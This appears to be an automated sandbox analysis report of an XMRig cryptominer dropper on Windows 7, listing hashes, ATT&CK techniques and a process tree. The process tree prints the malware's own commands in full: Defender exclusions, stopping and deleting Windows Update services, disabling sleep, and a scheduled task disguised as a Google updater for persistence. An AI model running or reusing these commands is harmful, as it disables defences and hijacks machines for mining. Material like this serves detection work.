xmrig | 2a52bd1672e345f12e0175bcaec0f9c520c8523d74e576c222a89b7b258f64f2

Analysis

max time kernel
300s
max time network
296s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
25-09-2022 11:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

11.exe
Size

7.0MB
MD5

b76c48fd62b955eea124b76e3e1eddf0
SHA1

40ac78ddd36295c7abf81e9e1405f2e75953ab17
SHA256

2a52bd1672e345f12e0175bcaec0f9c520c8523d74e576c222a89b7b258f64f2
SHA512

9e5b59f61a2a1812923110cedd3fe85c9f0e8332450f89a625b525786d0705e8e5f90067c38f8ed73ef1eb446871dbeda8906edba8cb0e4d1893577cf6a85209
SSDEEP

196608:Zff6pVbPXSxEieA3Rry41AjbZLKjewctp28CWcDdod0Xi6P:VypUxRrP1KIePp2jWcy0XiE

Score

10^/10

xmrig evasion miner themida trojan upx

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

11.exeupdater.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 11.exe
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	11.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	updater.exe

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/2044-166-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/2044-168-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig

Drops file in Drivers directory 2 IoCs

Processes:

11.exeupdater.exe

description ioc process

File created C:\Windows\system32\drivers\etc\hosts 11.exe
File created C:\Windows\system32\drivers\etc\hosts updater.exe
Executes dropped EXE 1 IoCs

Processes:

updater.exe

pid process

1532 updater.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

description	ioc	process
File created	C:\Windows\system32\drivers\etc\hosts	11.exe
File created	C:\Windows\system32\drivers\etc\hosts	updater.exe

pid	process
1532	updater.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/2044-166-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/2044-168-0x0000000140000000-0x00000001407F4000-memory.dmp	upx

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

updater.exe11.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	11.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	11.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	updater.exe

Loads dropped DLL 1 IoCs

Processes:

taskeng.exe

pid process

292 taskeng.exe

pid	process
292	taskeng.exe

Themida packer 20 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral1/memory/1604-54-0x000000013F650000-0x00000001402FB000-memory.dmp	themida
behavioral1/memory/1604-55-0x000000013F650000-0x00000001402FB000-memory.dmp	themida
behavioral1/memory/1604-56-0x000000013F650000-0x00000001402FB000-memory.dmp	themida
behavioral1/memory/1604-57-0x000000013F650000-0x00000001402FB000-memory.dmp	themida
behavioral1/memory/1604-58-0x000000013F650000-0x00000001402FB000-memory.dmp	themida
behavioral1/memory/1604-59-0x000000013F650000-0x00000001402FB000-memory.dmp	themida
behavioral1/memory/1604-60-0x000000013F650000-0x00000001402FB000-memory.dmp	themida
behavioral1/memory/1604-80-0x000000013F650000-0x00000001402FB000-memory.dmp	themida
behavioral1/memory/1604-100-0x000000013F650000-0x00000001402FB000-memory.dmp	themida
\Program Files\Google\Chrome\updater.exe	themida
C:\Program Files\Google\Chrome\updater.exe	themida
behavioral1/memory/1532-114-0x000000013F9E0000-0x000000014068B000-memory.dmp	themida
behavioral1/memory/1532-115-0x000000013F9E0000-0x000000014068B000-memory.dmp	themida
behavioral1/memory/1532-118-0x000000013F9E0000-0x000000014068B000-memory.dmp	themida
behavioral1/memory/1532-116-0x000000013F9E0000-0x000000014068B000-memory.dmp	themida
behavioral1/memory/1532-119-0x000000013F9E0000-0x000000014068B000-memory.dmp	themida
behavioral1/memory/1532-120-0x000000013F9E0000-0x000000014068B000-memory.dmp	themida
behavioral1/memory/1532-153-0x000000013F9E0000-0x000000014068B000-memory.dmp	themida
C:\Program Files\Google\Chrome\updater.exe	themida
behavioral1/memory/1532-164-0x000000013F9E0000-0x000000014068B000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

11.exeupdater.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	11.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

11.exeupdater.exe

pid process

1604 11.exe
1532 updater.exe

pid	process
1604	11.exe
1532	updater.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

updater.exe

description	pid	process	target process
PID 1532 set thread context of 2012	1532	updater.exe	conhost.exe
PID 1532 set thread context of 2044	1532	updater.exe	conhost.exe

Drops file in Program Files directory 4 IoCs

Processes:

cmd.exe11.exeupdater.execmd.exe

description	ioc	process
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Chrome\updater.exe	11.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

572 sc.exe
1396 sc.exe
584 sc.exe
320 sc.exe
332 sc.exe
1320 sc.exe
1164 sc.exe
1804 sc.exe
1952 sc.exe
1092 sc.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1416 schtasks.exe
276 schtasks.exe

pid	process
572	sc.exe
1396	sc.exe
584	sc.exe
320	sc.exe
332	sc.exe
1320	sc.exe
1164	sc.exe
1804	sc.exe
1952	sc.exe
1092	sc.exe

pid	process
1416	schtasks.exe
276	schtasks.exe

Modifies data under HKEY_USERS 3 IoCs

Processes:

powershell.exeWMIC.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = e0d31739e6d0d801	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.exe

pid	process
1260	powershell.exe
1316	powershell.exe
1796	powershell.exe
2040	powershell.exe
1104	powershell.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe
2044	conhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

464

pid	process
464

Suspicious use of AdjustPrivilegeToken 38 IoCs

Processes:

powershell.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowershell.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exeWMIC.execonhost.exe

description	pid	process
Token: SeDebugPrivilege	1260	powershell.exe
Token: SeShutdownPrivilege	364	powercfg.exe
Token: SeDebugPrivilege	1316	powershell.exe
Token: SeShutdownPrivilege	572	powercfg.exe
Token: SeShutdownPrivilege	1140	powercfg.exe
Token: SeShutdownPrivilege	1380	powercfg.exe
Token: SeDebugPrivilege	1796	powershell.exe
Token: SeDebugPrivilege	2040	powershell.exe
Token: SeShutdownPrivilege	1108	powercfg.exe
Token: SeDebugPrivilege	1104	powershell.exe
Token: SeShutdownPrivilege	1760	powercfg.exe
Token: SeShutdownPrivilege	908	powercfg.exe
Token: SeShutdownPrivilege	1148	powercfg.exe
Token: SeAssignPrimaryTokenPrivilege	1612	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1612	WMIC.exe
Token: SeSecurityPrivilege	1612	WMIC.exe
Token: SeTakeOwnershipPrivilege	1612	WMIC.exe
Token: SeLoadDriverPrivilege	1612	WMIC.exe
Token: SeSystemtimePrivilege	1612	WMIC.exe
Token: SeBackupPrivilege	1612	WMIC.exe
Token: SeRestorePrivilege	1612	WMIC.exe
Token: SeShutdownPrivilege	1612	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1612	WMIC.exe
Token: SeUndockPrivilege	1612	WMIC.exe
Token: SeManageVolumePrivilege	1612	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1612	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1612	WMIC.exe
Token: SeSecurityPrivilege	1612	WMIC.exe
Token: SeTakeOwnershipPrivilege	1612	WMIC.exe
Token: SeLoadDriverPrivilege	1612	WMIC.exe
Token: SeSystemtimePrivilege	1612	WMIC.exe
Token: SeBackupPrivilege	1612	WMIC.exe
Token: SeRestorePrivilege	1612	WMIC.exe
Token: SeShutdownPrivilege	1612	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1612	WMIC.exe
Token: SeUndockPrivilege	1612	WMIC.exe
Token: SeManageVolumePrivilege	1612	WMIC.exe
Token: SeLockMemoryPrivilege	2044	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

11.execmd.execmd.exepowershell.exepowershell.exetaskeng.exe

description	pid	process	target process
PID 1604 wrote to memory of 1260	1604	11.exe	powershell.exe
PID 1604 wrote to memory of 1260	1604	11.exe	powershell.exe
PID 1604 wrote to memory of 1260	1604	11.exe	powershell.exe
PID 1604 wrote to memory of 996	1604	11.exe	cmd.exe
PID 1604 wrote to memory of 996	1604	11.exe	cmd.exe
PID 1604 wrote to memory of 996	1604	11.exe	cmd.exe
PID 1604 wrote to memory of 1252	1604	11.exe	cmd.exe
PID 1604 wrote to memory of 1252	1604	11.exe	cmd.exe
PID 1604 wrote to memory of 1252	1604	11.exe	cmd.exe
PID 1604 wrote to memory of 1316	1604	11.exe	powershell.exe
PID 1604 wrote to memory of 1316	1604	11.exe	powershell.exe
PID 1604 wrote to memory of 1316	1604	11.exe	powershell.exe
PID 996 wrote to memory of 1164	996	cmd.exe	sc.exe
PID 996 wrote to memory of 1164	996	cmd.exe	sc.exe
PID 996 wrote to memory of 1164	996	cmd.exe	sc.exe
PID 1252 wrote to memory of 364	1252	cmd.exe	powercfg.exe
PID 1252 wrote to memory of 364	1252	cmd.exe	powercfg.exe
PID 1252 wrote to memory of 364	1252	cmd.exe	powercfg.exe
PID 996 wrote to memory of 1804	996	cmd.exe	sc.exe
PID 996 wrote to memory of 1804	996	cmd.exe	sc.exe
PID 996 wrote to memory of 1804	996	cmd.exe	sc.exe
PID 996 wrote to memory of 1952	996	cmd.exe	sc.exe
PID 996 wrote to memory of 1952	996	cmd.exe	sc.exe
PID 996 wrote to memory of 1952	996	cmd.exe	sc.exe
PID 996 wrote to memory of 1092	996	cmd.exe	sc.exe
PID 996 wrote to memory of 1092	996	cmd.exe	sc.exe
PID 996 wrote to memory of 1092	996	cmd.exe	sc.exe
PID 1252 wrote to memory of 572	1252	cmd.exe	powercfg.exe
PID 1252 wrote to memory of 572	1252	cmd.exe	powercfg.exe
PID 1252 wrote to memory of 572	1252	cmd.exe	powercfg.exe
PID 996 wrote to memory of 584	996	cmd.exe	sc.exe
PID 996 wrote to memory of 584	996	cmd.exe	sc.exe
PID 996 wrote to memory of 584	996	cmd.exe	sc.exe
PID 996 wrote to memory of 1520	996	cmd.exe	reg.exe
PID 996 wrote to memory of 1520	996	cmd.exe	reg.exe
PID 996 wrote to memory of 1520	996	cmd.exe	reg.exe
PID 1252 wrote to memory of 1140	1252	cmd.exe	powercfg.exe
PID 1252 wrote to memory of 1140	1252	cmd.exe	powercfg.exe
PID 1252 wrote to memory of 1140	1252	cmd.exe	powercfg.exe
PID 996 wrote to memory of 1480	996	cmd.exe	reg.exe
PID 996 wrote to memory of 1480	996	cmd.exe	reg.exe
PID 996 wrote to memory of 1480	996	cmd.exe	reg.exe
PID 996 wrote to memory of 1824	996	cmd.exe	reg.exe
PID 996 wrote to memory of 1824	996	cmd.exe	reg.exe
PID 996 wrote to memory of 1824	996	cmd.exe	reg.exe
PID 996 wrote to memory of 1428	996	cmd.exe	reg.exe
PID 996 wrote to memory of 1428	996	cmd.exe	reg.exe
PID 996 wrote to memory of 1428	996	cmd.exe	reg.exe
PID 1252 wrote to memory of 1380	1252	cmd.exe	powercfg.exe
PID 1252 wrote to memory of 1380	1252	cmd.exe	powercfg.exe
PID 1252 wrote to memory of 1380	1252	cmd.exe	powercfg.exe
PID 996 wrote to memory of 1972	996	cmd.exe	reg.exe
PID 996 wrote to memory of 1972	996	cmd.exe	reg.exe
PID 996 wrote to memory of 1972	996	cmd.exe	reg.exe
PID 1316 wrote to memory of 276	1316	powershell.exe	schtasks.exe
PID 1316 wrote to memory of 276	1316	powershell.exe	schtasks.exe
PID 1316 wrote to memory of 276	1316	powershell.exe	schtasks.exe
PID 1604 wrote to memory of 1796	1604	11.exe	powershell.exe
PID 1604 wrote to memory of 1796	1604	11.exe	powershell.exe
PID 1604 wrote to memory of 1796	1604	11.exe	powershell.exe
PID 1796 wrote to memory of 1620	1796	powershell.exe	schtasks.exe
PID 1796 wrote to memory of 1620	1796	powershell.exe	schtasks.exe
PID 1796 wrote to memory of 1620	1796	powershell.exe	schtasks.exe
PID 292 wrote to memory of 1532	292	taskeng.exe	updater.exe

C:\Users\Admin\AppData\Local\Temp\11.exe
"C:\Users\Admin\AppData\Local\Temp\11.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1604

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1260

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:996

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:1164

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1804

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:1952

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1092

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:584

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:1520

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:1480

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:1824

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:1428

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:1972

C:\Windows\system32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:1252

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:364

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:572

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1140

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1380

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#kfqirnwiw#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1316

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
3⤵
- Creates scheduled task(s)
PID:276

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#khtnr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1796

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
3⤵
PID:1620

C:\Windows\system32\taskeng.exe
taskeng.exe {67A561F8-0A9F-4B32-BA57-A4D704C276B6} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:292

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:1532

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2040

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:784

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:572

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:1396

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:320

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:332

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:1320

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
4⤵
PID:1932

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
4⤵
PID:1752

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
4⤵
PID:1976

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
4⤵
PID:112

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
4⤵
PID:1888

C:\Windows\system32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
PID:832

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1108

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1760

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1148

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:908

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#kfqirnwiw#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1104

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
4⤵
- Creates scheduled task(s)
PID:1416

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe lhmcarocyjvzk
3⤵
PID:2012

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
4⤵
- Drops file in Program Files directory
PID:1644

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
3⤵
- Drops file in Program Files directory
PID:1252

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
4⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1612

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe jftlneyiewlaxjvq GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/8HOYVji2aTn31s7dz3/WlCN+UmM7HFUgStV0krKswFnOvNVFJHtjMrdLvilnrbVN4TalQD/4emuEzW66JneW1mVBd6IrnBFdAaSbxamnHt0v75gn2+2heHSc2pqg9laV
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2044

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe
Filesize
7.0MB

MD5
0b1c9cde6b467847472545263c58791c

SHA1
3acaf0cefda3ab7e43c18a8eb17ec69477cc36a8

SHA256
394ccb1ddb7208fb72d9f0a277c13202f9f2843652287eaa7355d83d88170f14

SHA512
276f7effb5ec82d444aadcea8523916d6dcc76a63826bc24fa3f7ee2b2f5cc5d3994d7747aaa44b17c67d475dca41c90533e166d187e890a76bd144e0f8e0c02

Download Submit
C:\Program Files\Google\Chrome\updater.exe
Filesize
7.0MB

MD5
0b1c9cde6b467847472545263c58791c

SHA1
3acaf0cefda3ab7e43c18a8eb17ec69477cc36a8

SHA256
394ccb1ddb7208fb72d9f0a277c13202f9f2843652287eaa7355d83d88170f14

SHA512
